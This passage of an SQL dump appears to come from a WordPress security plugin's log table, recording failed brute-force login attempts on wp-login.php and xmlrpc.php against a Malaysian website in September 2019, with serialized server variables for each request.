12:37:28',18254480,19552400,'https://bintara.com.my/xmlrpc.php',1,0,'107.161.24.34'),(24549,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"54606\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDUdVd3b0tfDgYOg7j8XwAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724085.5787\";s:12:\"REQUEST_TIME\";s:10:\"1568724085\";}}','notice','2019-09-17 12:41:26','2019-09-17 12:41:25',17741424,19232480,'https://bintara.com.my/wp-login.php',1,0,'162.144.41.232'),(24550,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"54998\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDUeFd3b0tfDgYOg7j8cwAAAJU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724088.3768\";s:12:\"REQUEST_TIME\";s:10:\"1568724088\";}}','notice','2019-09-17 12:41:29','2019-09-17 12:41:28',18253080,19549360,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.41.232'),(24551,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"69.167.187.204\";s:11:\"REMOTE_PORT\";s:5:\"47282\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDVa1d3b0tfDgYOg7j86QAAAIo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724331.6691\";s:12:\"REQUEST_TIME\";s:10:\"1568724331\";}}','notice','2019-09-17 12:45:33','2019-09-17 12:45:32',17742496,19232296,'https://bintara.com.my/wp-login.php',1,0,'69.167.187.204'),(24552,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"69.167.187.204\";s:11:\"REMOTE_PORT\";s:5:\"48292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDVb1d3b0tfDgYOg7j86wAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724335.7072\";s:12:\"REQUEST_TIME\";s:10:\"1568724335\";}}','notice','2019-09-17 12:45:38','2019-09-17 12:45:36',18253080,19549360,'https://bintara.com.my/xmlrpc.php',1,0,'69.167.187.204'),(24553,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.175.10.113\";s:11:\"REMOTE_PORT\";s:5:\"58292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDXWbIp53uPsY7BKArxAQAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724825.3178\";s:12:\"REQUEST_TIME\";s:10:\"1568724825\";}}','notice','2019-09-17 12:53:47','2019-09-17 12:53:45',17747672,19233784,'https://bintara.com.my/wp-login.php',1,0,'108.175.10.113'),(24554,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.175.10.113\";s:11:\"REMOTE_PORT\";s:5:\"58292\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDXWbIp53uPsY7BKArxAQAAAEY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724825.3178\";s:12:\"REQUEST_TIME\";s:10:\"1568724825\";}}','notice','2019-09-17 12:53:47','2019-09-17 12:53:45',17909512,19233784,'https://bintara.com.my/wp-login.php',1,0,'108.175.10.113'),(25128,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"14.248.83.23\";s:11:\"REMOTE_PORT\";s:5:\"35526\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM0PNd7mFxrJDg7xkLqfwAAAFc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568879676.8924\";s:12:\"REQUEST_TIME\";s:10:\"1568879676\";}}','notice','2019-09-19 07:54:38','2019-09-19 07:54:37',18257608,19553272,'https://bintara.com.my/xmlrpc.php',1,0,'14.248.83.23'),(25129,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"46214\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM3Uh1AWtxZyz0ToGmGJgAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568880466.172\";s:12:\"REQUEST_TIME\";s:10:\"1568880466\";}}','notice','2019-09-19 08:07:47','2019-09-19 08:07:46',17738792,19230528,'https://bintara.com.my/wp-login.php',1,0,'74.115.209.253'),(25127,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"14.248.83.23\";s:11:\"REMOTE_PORT\";s:5:\"35198\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYM0Os@trAUOPPoD0z1MJwAAAMo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568879674.2804\";s:12:\"REQUEST_TIME\";s:10:\"1568879674\";}}','notice','2019-09-19 07:54:35','2019-09-19 